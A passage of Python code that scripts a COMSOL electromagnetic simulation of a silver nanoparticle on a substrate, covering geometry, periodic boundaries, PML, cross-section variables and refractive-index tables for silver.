model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc1\").selection(\n \"selection\"\n ).init(2)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc1\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 31, 54)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc1\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 34, 57)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel_pc2\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc2\").selection(\n \"selection\"\n ).init(2)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc2\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 32, 39)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc2\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 35, 42)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel_ftri1\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_ftri1\").selection(\n \"selection\"\n ).init(2)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_ftri1\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 31, 32, 39, 54)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_ftri1\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 34, 35, 42, 57)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"air\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"air\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"substrate\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"substrate\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"wp1\", \"WorkPlane\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").set(\n \"unite\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().create(\n \"image_ic\", \"InterpolationCurve\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"type\", \"solid\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"source\", \"file\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"filename\", outer_contour_file_path)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"struct\", \"sectionwise\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"rtol\", 0.001)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().create(\n \"scale_ic\", \"Scale\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"scale_ic\"\n ).setIndex(\"factor\", \"5.000000000000001E-7/2400\", Integer(0))\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"scale_ic\"\n ).selection(\"input\").set(\"image_ic\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"ext1\", \"Extrude\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext1\").setIndex(\n \"distance\", \"40[nm]\", Integer(0)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext1\").selection(\"input\").set(\n \"wp1\"\n )\n nano_particle_handle = None\n if inner_contour_file_path is not None:\n model.java.component(\"comp1\").geom(\"geom1\").create(\"wp2\", \"WorkPlane\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").set(\n \"unite\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().create(\n \"ic1\", \"InterpolationCurve\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"type\", \"solid\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"source\", \"file\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"filename\", inner_contour_file_path)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"struct\", \"sectionwise\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"rtol\", 0.001)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().create(\n \"scale_ic1\", \"Scale\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"scale_ic1\"\n ).label(\"Scale\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"scale_ic1\"\n ).setIndex(\"factor\", \"5.000000000000001E-7/2400\", Integer(0))\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"scale_ic1\"\n ).selection(\"input\").set(\"ic1\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"ext2\", \"Extrude\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext2\").setIndex(\n \"distance\", \"40[nm]\", Integer(0)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext2\").selection(\n \"input\"\n ).set(\"wp2\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"mov2\", \"Move\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").label(\"Move\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"displx\", \"-250[nm]\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"disply\", \"-250[nm]\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").selection(\n \"input\"\n ).set(\"ext1\", \"ext2\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"dif1\", \"Difference\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").label(\n \"Nanoparticle\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").set(\n \"contributeto\", \"csel1\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").set(\n \"selresultshow\", \"all\"\n )\n\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").selection(\n \"input\"\n ).set(\"mov2(1)\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").selection(\n \"input2\"\n ).set(\"mov2(2)\")\n\n nano_particle_handle = \"geom1_dif1\"\n else:\n model.java.component(\"comp1\").geom(\"geom1\").create(\"mov2\", \"Move\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").label(\n \"Nanoparticle\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"contributeto\", \"csel1\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"selresultshow\", \"all\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"displx\", \"-250[nm]\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"disply\", \"-250[nm]\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").selection(\n \"input\"\n ).set(\"ext1\")\n nano_particle_handle = \"geom1_mov2\"\n model.java.component(\"comp1\").geom(\"geom1\").run(\"fin\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel1\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel1\").label(\n \"Physical domains without antenna\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel1\").selection(\n \"selection\"\n ).set(\"fin(1)\", 18, 19)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel1\").set(\n \"contributeto\", \"csel1\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"comsel1\", \"ComplementSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"comsel1\").label(\n \"PML Domains Geometry\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"comsel1\").set(\n \"input\", [\"csel1\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").run()\n if inner_contour_file_path is not None:\n model.java.component(\"comp1\").geom(\"geom1\").run(\"dif1\")\n\n model.java.component(\"comp1\").selection().create(\"sel2\", \"Explicit\")\n model.java.component(\"comp1\").selection(\"sel2\").set(1, 2, 3)\n model.java.component(\"comp1\").selection().create(\"sel3\", \"Explicit\")\n model.java.component(\"comp1\").selection(\"sel3\").geom(\"geom1\", 3, 2, [\"exterior\"])\n model.java.component(\"comp1\").selection(\"sel3\").set(1, 2, 3, 4, 5, 6, 7)\n model.java.component(\"comp1\").selection().create(\"uni1\", \"Union\")\n\n model.java.component(\"comp1\").variable().create(\"var1\")\n model.java.component(\"comp1\").variable(\"var1\").set(\"ewfd.Ey\", \"0\")\n model.java.component(\"comp1\").variable(\"var1\").set(\"ewfd.Ez\", \"0\")\n model.java.component(\"comp1\").variable(\"var1\").set(\"ewfd.Ex\", \"0\")\n model.java.component(\"comp1\").variable(\"var1\").selection().named(\"geom1_comsel1\")\n model.java.component(\"comp1\").variable().create(\"var2\")\n model.java.component(\"comp1\").variable(\"var2\").set(\"E0x\", \"-sin(phi)\")\n model.java.component(\"comp1\").variable(\"var2\").set(\"E0y\", \"cos(phi)\")\n model.java.component(\"comp1\").variable(\"var2\").selection().geom(\"geom1\", Integer(2))\n model.java.component(\"comp1\").variable(\"var2\").selection().set(62, 68)\n model.java.component(\"comp1\").variable().create(\"var3\")\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"nrelPoav\",\n \"nx*ewfd2.relPoavx+ny*ewfd2.relPoavy+nz*ewfd2.relPoavz\",\n \"Relative normal Poynting flux\",\n )\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"sigma_sc\", \"intop_surf(nrelPoav)/I0\", \"Scattering cross section\"\n )\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"sigma_abs\", \"intop_vol(ewfd2.Qh)/I0\", \"Absorption cross section\"\n )\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"sigma_ext\", \"sigma_sc+sigma_abs\", \"Extinction cross section\"\n )\n\n model.java.component(\"comp1\").view(\"view1\").clip().create(\"plane1\", \"ClipPlane\")\n model.java.component(\"comp1\").view(\"view1\").clip().create(\"plane2\", \"ClipPlane\")\n\n model.java.component(\"comp1\").material().create(\"mat1\", \"Common\")\n model.java.component(\"comp1\").material().create(\"mat2\", \"Common\")\n model.java.component(\"comp1\").material().create(\"mat5\", \"Common\")\n model.java.component(\"comp1\").material(\"mat1\").selection().named(\"geom1_air\")\n model.java.component(\"comp1\").material(\"mat1\").propertyGroup().create(\n \"RefractiveIndex\", \"Refractive index\"\n )\n model.java.component(\"comp1\").material(\"mat2\").selection().named(\"geom1_substrate\")\n model.java.component(\"comp1\").material(\"mat2\").propertyGroup().create(\n \"RefractiveIndex\", \"Refractive index\"\n )\n model.java.component(\"comp1\").material(\"mat5\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup().create(\n \"RefractiveIndex\", \"Refractive index\"\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func().create(\"int1\", \"Interpolation\")\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func().create(\"int2\", \"Interpolation\")\n\n model.java.component(\"comp1\").cpl().create(\"intop1\", \"Integration\")\n model.java.component(\"comp1\").cpl().create(\"intop2\", \"Integration\")\n model.java.component(\"comp1\").cpl(\"intop1\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").cpl(\"intop2\").selection().named(\n f\"{nano_particle_handle}_bnd\"\n )\n\n model.java.component(\"comp1\").coordSystem().create(\"pml1\", \"PML\")\n model.java.component(\"comp1\").coordSystem(\"pml1\").selection().named(\"geom1_comsel1\")\n\n model.java.component(\"comp1\").physics().create(\n \"ewfd\", \"ElectromagneticWavesFrequencyDomain\", \"geom1\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").selection().named(\"geom1_csel1_dom\")\n model.java.component(\"comp1\").physics(\"ewfd\").create(\n \"wee2\", \"WaveEquationElectric\", Integer(3)\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee2\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").create(\"port1\", \"Port\", Integer(2))\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").selection().set(68)\n model.java.component(\"comp1\").physics(\"ewfd\").create(\"port2\", \"Port\", Integer(2))\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").selection().set(62)\n model.java.component(\"comp1\").physics(\"ewfd\").create(\n \"pc1\", \"PeriodicCondition\", Integer(2)\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc1\").selection().named(\n \"geom1_sel_pc1\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").create(\n \"pc2\", \"PeriodicCondition\", Integer(2)\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc2\").selection().named(\n \"geom1_sel_pc2\"\n )\n model.java.component(\"comp1\").physics().create(\n \"ewfd2\", \"ElectromagneticWavesFrequencyDomain\", \"geom1\"\n )\n\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"size1\", \"Size\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"size2\", \"Size\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"ftri1\", \"FreeTri\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"ftet1\", \"FreeTet\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"swe1\", \"Sweep\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size1\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").selection().geom(\n \"geom1\", Integer(3)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").selection().set(18)\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftri1\").selection().named(\n \"geom1_sel_ftri1\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").selection().named(\n \"geom1_csel1_dom\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").create(\n \"dis1\", \"Distribution\"\n )\n\n model.java.result().table(\"tbl2\").comments(\"LightToHeat\")\n\n model.java.component(\"comp1\").material(\"mat1\").label(\"Air\")\n model.java.component(\"comp1\").material(\"mat1\").propertyGroup(\"RefractiveIndex\").set(\n \"n\", [\"na\", \"0\", \"0\", \"0\", \"na\", \"0\", \"0\", \"0\", \"na\"]\n )\n model.java.component(\"comp1\").material(\"mat2\").label(\"Substrate\")\n model.java.component(\"comp1\").material(\"mat2\").propertyGroup(\"RefractiveIndex\").set(\n \"n\", [\"nb\", \"0\", \"0\", \"0\", \"nb\", \"0\", \"0\", \"0\", \"nb\"]\n )\n model.java.component(\"comp1\").material(\"mat5\").label(\n \"Ag (Silver) (Rakic et al. 1998: Brendel-Bormann model n,k 0.248-12.4 um)\"\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\"funcname\", \"nr\")\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\n \"table\",\n [\n [\"2.4797e-01\", \"8.4863e-01\"],\n [\"2.5289e-01\", \"8.2493e-01\"],\n [\"2.5791e-01\", \"7.9699e-01\"],\n [\"2.6303e-01\", \"8.0009e-01\"],\n [\"2.6825e-01\", \"8.7536e-01\"],\n [\"2.7358e-01\", \"1.0320e+00\"],\n [\"2.7901e-01\", \"1.2351e+00\"],\n [\"2.8455e-01\", \"1.4245e+00\"],\n [\"2.9020e-01\", \"1.5424e+00\"],\n [\"2.9596e-01\", \"1.5549e+00\"],\n [\"3.0184e-01\", \"1.4594e+00\"],\n [\"3.0783e-01\", \"1.2767e+00\"],\n [\"3.1394e-01\", \"1.0361e+00\"],\n [\"3.2017e-01\", \"7.6783e-01\"],\n [\"3.2653e-01\", \"5.2213e-01\"],\n [\"3.3301e-01\", \"3.6378e-01\"],\n [\"3.3962e-01\", \"2.7960e-01\"],\n [\"3.4637e-01\", \"2.3178e-01\"],\n [\"3.5324e-01\", \"2.0172e-01\"],\n [\"3.6025e-01\", \"1.8151e-01\"],\n [\"3.6741e-01\", \"1.6741e-01\"],\n [\"3.7470e-01\", \"1.5739e-01\"],\n [\"3.8214e-01\", \"1.5021e-01\"],\n [\"3.8973e-01\", \"1.4506e-01\"],\n [\"3.9746e-01\", \"1.4141e-01\"],\n [\"4.0535e-01\", \"1.3887e-01\"],\n [\"4.1340e-01\", \"1.3716e-01\"],\n [\"4.2161e-01\", \"1.3609e-01\"],\n [\"4.2998e-01\", \"1.3550e-01\"],\n [\"4.3852e-01\", \"1.3529e-01\"],\n [\"4.4722e-01\", \"1.3537e-01\"],\n [\"4.5610e-01\", \"1.3569e-01\"],\n [\"4.6515e-01\", \"1.3621e-01\"],\n [\"4.7439e-01\", \"1.3687e-01\"],\n [\"4.8381e-01\", \"1.3767e-01\"],\n [\"4.9341e-01\", \"1.3857e-01\"],\n [\"5.0321e-01\", \"1.3958e-01\"],\n [\"5.1320e-01\", \"1.4067e-01\"],\n [\"5.2339e-01\", \"1.4184e-01\"],\n [\"5.3378e-01\", \"1.4308e-01\"],\n [\"5.4437e-01\", \"1.4440e-01\"],\n [\"5.5518e-01\", \"1.4578e-01\"],\n [\"5.6620e-01\", \"1.4723e-01\"],\n [\"5.7744e-01\", \"1.4875e-01\"],\n [\"5.8891e-01\", \"1.5034e-01\"],\n [\"6.0060e-01\", \"1.5200e-01\"],\n [\"6.1252e-01\", \"1.5373e-01\"],\n [\"6.2468e-01\", \"1.5554e-01\"],\n [\"6.3709e-01\", \"1.5742e-01\"],\n [\"6.4973e-01\", \"1.5939e-01\"],\n [\"6.6263e-01\", \"1.6143e-01\"],\n [\"6.7579e-01\", \"1.6356e-01\"],\n [\"6.8920e-01\", \"1.6579e-01\"],\n [\"7.0289e-01\", \"1.6810e-01\"],\n [\"7.1684e-01\", \"1.7051e-01\"],\n [\"7.3107e-01\", \"1.7303e-01\"],\n [\"7.4559e-01\", \"1.7565e-01\"],\n [\"7.6039e-01\", \"1.7838e-01\"],\n [\"7.7549e-01\", \"1.8123e-01\"],\n [\"7.9088e-01\", \"1.8420e-01\"],\n [\"8.0658e-01\", \"1.8729e-01\"],\n [\"8.2260e-01\", \"1.9051e-01\"],\n [\"8.3893e-01\", \"1.9387e-01\"],\n [\"8.5558e-01\", \"1.9737e-01\"],\n [\"8.7257e-01\", \"2.0102e-01\"],\n [\"8.8989e-01\", \"2.0482e-01\"],\n [\"9.0756e-01\", \"2.0878e-01\"],\n [\"9.2557e-01\", \"2.1291e-01\"],\n [\"9.4395e-01\", \"2.1721e-01\"],\n [\"9.6269e-01\", \"2.2169e-01\"],\n [\"9.8180e-01\", \"2.2636e-01\"],\n [\"1.0013e+00\", \"2.3122e-01\"],\n [\"1.0212e+00\", \"2.3628e-01\"],\n [\"1.0414e+00\", \"2.4155e-01\"],\n [\"1.0621e+00\", \"2.4705e-01\"],\n [\"1.0832e+00\", \"2.5277e-01\"],\n [\"1.1047e+00\", \"2.5872e-01\"],\n [\"1.1266e+00\", \"2.6493e-01\"],\n [\"1.1490e+00\", \"2.7138e-01\"],\n [\"1.1718e+00\", \"2.7811e-01\"],\n [\"1.1951e+00\", \"2.8511e-01\"],\n [\"1.2188e+00\", \"2.9239e-01\"],\n [\"1.2430e+00\", \"2.9998e-01\"],\n [\"1.2677e+00\", \"3.0788e-01\"],\n [\"1.2929e+00\", \"3.1609e-01\"],\n [\"1.3185e+00\", \"3.2465e-01\"],\n [\"1.3447e+00\", \"3.3355e-01\"],\n [\"1.3714e+00\", \"3.4281e-01\"],\n [\"1.3986e+00\", \"3.5245e-01\"],\n [\"1.4264e+00\", \"3.6249e-01\"],\n [\"1.4547e+00\", \"3.7292e-01\"],\n [\"1.4836e+00\", \"3.8379e-01\"],\n [\"1.5130e+00\", \"3.9509e-01\"],\n [\"1.5431e+00\", \"4.0684e-01\"],\n [\"1.5737e+00\", \"4.1908e-01\"],\n [\"1.6050e+00\", \"4.3180e-01\"],\n [\"1.6368e+00\", \"4.4504e-01\"],\n [\"1.6693e+00\", \"4.5882e-01\"],\n [\"1.7025e+00\", \"4.7314e-01\"],\n [\"1.7363e+00\", \"4.8805e-01\"],\n [\"1.7707e+00\", \"5.0355e-01\"],\n [\"1.8059e+00\", \"5.1967e-01\"],\n [\"1.8417e+00\", \"5.3644e-01\"],\n [\"1.8783e+00\", \"5.5389e-01\"],\n [\"1.9156e+00\", \"5.7203e-01\"],\n [\"1.9536e+00\", \"5.9090e-01\"],\n [\"1.9924e+00\", \"6.1053e-01\"],\n [\"2.0319e+00\", \"6.3094e-01\"],\n [\"2.0723e+00\", \"6.5216e-01\"],\n [\"2.1134e+00\", \"6.7424e-01\"],\n [\"2.1554e+00\", \"6.9719e-01\"],\n [\"2.1982e+00\", \"7.2106e-01\"],\n [\"2.2418e+00\", \"7.4588e-01\"],\n [\"2.2863e+00\", \"7.7170e-01\"],\n [\"2.3317e+00\", \"7.9854e-01\"],\n [\"2.3780e+00\", \"8.2645e-01\"],\n [\"2.4252e+00\", \"8.5546e-01\"],\n [\"2.4734e+00\", \"8.8564e-01\"],\n [\"2.5225e+00\", \"9.1701e-01\"],\n [\"2.5725e+00\", \"9.4962e-01\"],\n [\"2.6236e+00\", \"9.8353e-01\"],\n [\"2.6757e+00\", \"1.0188e+00\"],\n [\"2.7288e+00\", \"1.0554e+00\"],\n [\"2.7830e+00\", \"1.0935e+00\"],\n [\"2.8383e+00\", \"1.1332e+00\"],\n [\"2.8946e+00\", \"1.1743e+00\"],\n [\"2.9521e+00\", \"1.2171e+00\"],\n [\"3.0107e+00\", \"1.2616e+00\"],\n [\"3.0704e+00\", \"1.3079e+00\"],\n [\"3.1314e+00\", \"1.3560e+00\"],\n [\"3.1936e+00\", \"1.4060e+00\"],\n [\"3.2570e+00\", \"1.4579e+00\"],\n [\"3.3216e+00\", \"1.5119e+00\"],\n [\"3.3876e+00\", \"1.5680e+00\"],\n [\"3.4548e+00\", \"1.6263e+00\"],\n [\"3.5234e+00\", \"1.6869e+00\"],\n [\"3.5934e+00\", \"1.7499e+00\"],\n [\"3.6647e+00\", \"1.8153e+00\"],\n [\"3.7375e+00\", \"1.8833e+00\"],\n [\"3.8117e+00\", \"1.9540e+00\"],\n [\"3.8873e+00\", \"2.0274e+00\"],\n [\"3.9645e+00\", \"2.1036e+00\"],\n [\"4.0432e+00\", \"2.1829e+00\"],\n [\"4.1235e+00\", \"2.2652e+00\"],\n [\"4.2053e+00\", \"2.3507e+00\"],\n [\"4.2888e+00\", \"2.4396e+00\"],\n [\"4.3740e+00\", \"2.5319e+00\"],\n [\"4.4608e+00\", \"2.6277e+00\"],\n [\"4.5494e+00\", \"2.7273e+00\"],\n [\"4.6397e+00\", \"2.8307e+00\"],\n [\"4.7318e+00\", \"2.9381e+00\"],\n [\"4.8257e+00\", \"3.0496e+00\"],\n [\"4.9216e+00\", \"3.1654e+00\"],\n [\"5.0193e+00\", \"3.2856e+00\"],\n [\"5.1189e+00\", \"3.4104e+00\"],\n [\"5.2205e+00\", \"3.5400e+00\"],\n [\"5.3242e+00\", \"3.6745e+00\"],\n [\"5.4299e+00\", \"3.8141e+00\"],\n [\"5.5377e+00\", \"3.9591e+00\"],\n [\"5.6476e+00\", \"4.1095e+00\"],\n [\"5.7597e+00\", \"4.2656e+00\"],\n [\"5.8741e+00\", \"4.4275e+00\"],\n [\"5.9907e+00\", \"4.5956e+00\"],\n [\"6.1096e+00\", \"4.7699e+00\"],\n [\"6.2309e+00\", \"4.9508e+00\"],\n [\"6.3546e+00\", \"5.1384e+00\"],\n [\"6.4808e+00\", \"5.3329e+00\"],\n [\"6.6094e+00\", \"5.5347e+00\"],\n [\"6.7407e+00\", \"5.7439e+00\"],\n [\"6.8745e+00\", \"5.9609e+00\"],\n [\"7.0110e+00\", \"6.1857e+00\"],\n [\"7.1502e+00\", \"6.4188e+00\"],\n [\"7.2921e+00\", \"6.6604e+00\"],\n [\"7.4369e+00\", \"6.9107e+00\"],\n [\"7.5845e+00\", \"7.1701e+00\"],\n [\"7.7351e+00\", \"7.4389e+00\"],\n [\"7.8887e+00\", \"7.7172e+00\"],\n [\"8.0453e+00\", \"8.0055e+00\"],\n [\"8.2050e+00\", \"8.3040e+00\"],\n [\"8.3679e+00\", \"8.6131e+00\"],\n [\"8.5340e+00\", \"8.9330e+00\"],\n [\"8.7034e+00\", \"9.2642e+00\"],\n [\"8.8762e+00\", \"9.6068e+00\"],\n [\"9.0524e+00\", \"9.9614e+00\"],\n [\"9.2322e+00\", \"1.0328e+01\"],\n [\"9.4154e+00\", \"1.0707e+01\"],\n [\"9.6024e+00\", \"1.1100e+01\"],\n [\"9.7930e+00\", \"1.1505e+01\"],\n [\"9.9874e+00\", \"1.1924e+01\"],\n [\"1.0186e+01\", \"1.2357e+01\"],\n [\"1.0388e+01\", \"1.2805e+01\"],\n [\"1.0594e+01\", \"1.3267e+01\"],\n [\"1.0804e+01\", \"1.3744e+01\"],\n [\"1.1019e+01\", \"1.4237e+01\"],\n [\"1.1238e+01\", \"1.4746e+01\"],\n [\"1.1461e+01\", \"1.5270e+01\"],\n [\"1.1688e+01\", \"1.5812e+01\"],\n [\"1.1920e+01\", \"1.6370e+01\"],\n [\"1.2157e+01\", \"1.6946e+01\"],\n [\"1.2398e+01\", \"1.7540e+01\"],\n ],\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\"fununit\", [\"1\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\"argunit\", [\"um\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\"funcname\", \"ni\")\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\n \"table\",\n [\n [\"2.4797e-01\", \"1.1920e+00\"],\n [\"2.5289e-01\", \"1.2193e+00\"],\n [\"2.5791e-01\", \"1.2844e+00\"],\n [\"2.6303e-01\", \"1.3955e+00\"],\n [\"2.6825e-01\", \"1.5246e+00\"],\n [\"2.7358e-01\", \"1.6142e+00\"],\n [\"2.7901e-01\", \"1.6125e+00\"],\n [\"2.8455e-01\", \"1.5017e+00\"],\n [\"2.9020e-01\", \"1.3028e+00\"],\n [\"2.9596e-01\", \"1.0631e+00\"],\n [\"3.0184e-01\", \"8.3581e-01\"],\n [\"3.0783e-01\", \"6.6203e-01\"],\n [\"3.1394e-01\", \"5.6621e-01\"],\n [\"3.2017e-01\", \"5.6549e-01\"],\n [\"3.2653e-01\", \"6.7421e-01\"],\n [\"3.3301e-01\", \"8.4735e-01\"],\n [\"3.3962e-01\", \"1.0142e+00\"],\n [\"3.4637e-01\", \"1.1589e+00\"],\n [\"3.5324e-01\", \"1.2860e+00\"],\n [\"3.6025e-01\", \"1.4005e+00\"],\n [\"3.6741e-01\", \"1.5059e+00\"],\n [\"3.7470e-01\", \"1.6045e+00\"],\n [\"3.8214e-01\", \"1.6979e+00\"],\n [\"3.8973e-01\", \"1.7873e+00\"],\n [\"3.9746e-01\", \"1.8736e+00\"],\n [\"4.0535e-01\", \"1.9574e+00\"],\n [\"4.1340e-01\", \"2.0394e+00\"],\n [\"4.2161e-01\", \"2.1200e+00\"],\n [\"4.2998e-01\", \"2.1995e+00\"],\n [\"4.3852e-01\", \"2.2782e+00\"],\n [\"4.4722e-01\", \"2.3564e+00\"],\n [\"4.5610e-01\", \"2.4344e+00\"],\n [\"4.6515e-01\", \"2.5122e+00\"],\n [\"4.7439e-01\", \"2.5901e+00\"],\n [\"4.8381e-01\", \"2.6682e+00\"],\n [\"4.9341e-01\", \"2.7466e+00\"],\n [\"5.0321e-01\", \"2.8254e+00\"],\n [\"5.1320e-01\", \"2.9048e+00\"],\n [\"5.2339e-01\", \"2.9848e+00\"],\n [\"5.3378e-01\", \"3.0656e+00\"],\n [\"5.4437e-01\", \"3.1471e+00\"],\n [\"5.5518e-01\", \"3.2295e+00\"],\n [\"5.6620e-01\", \"3.3128e+00\"],\n [\"5.7744e-01\", \"3.3971e+00\"],\n [\"5.8891e-01\", \"3.4825e+00\"],\n [\"6.0060e-01\", \"3.5690e+00\"],\n [\"6.1252e-01\", \"3.6567e+00\"],\n [\"6.2468e-01\", \"3.7455e+00\"],\n [\"6.3709e-01\", 